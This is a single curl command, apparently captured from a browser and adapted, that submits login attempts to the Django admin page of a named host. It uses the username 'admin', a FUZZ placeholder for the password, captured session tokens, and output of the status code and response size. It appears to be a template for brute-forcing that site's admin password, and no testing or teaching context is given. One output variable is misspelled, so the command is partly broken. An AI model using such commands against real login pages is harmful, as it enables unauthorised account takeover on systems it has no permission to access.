curl 'https://time.atmosclouds.com/admin/login/?next=/admin/' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8' \
  -H 'Accept-Language: en-US,en;q=0.7' \
  -H 'Cache-Control: max-age=0' \
  -H 'Connection: keep-alive' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Cookie: csrftoken=cJ8zbpy4I9oVYB4UkTTA9IYsmXgLdsMjNNUlYbfdOX7NDc7B3bqDub3a37utfbXD' \
  -H 'Origin: https://time.atmosclouds.com' \
  -H 'Referer: https://time.atmosclouds.com/admin/login/?next=/admin/' \
  -H 'Sec-Fetch-Dest: document' \
  -H 'Sec-Fetch-Mode: navigate' \
  -H 'Sec-Fetch-Site: same-origin' \
  -H 'Sec-Fetch-User: ?1' \
  -H 'Sec-GPC: 1' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36' \
  -H 'sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Brave";v="126"' \
  -H 'sec-ch-ua-mobile: ?0' \
  -H 'sec-ch-ua-platform: "macOS"' \
  --data-raw 'csrfmiddlewaretoken=QsNlOTqrh1k7YU6iW7ZryR1tJ1tmY5d9rwz7BF7AnP3ZDv9ZFpwuTk6bqbH40Oot&username=admin&password=FUZZ&next=%2Fadmin%2F' \
  -w "%{http_code} %{size_dowload}"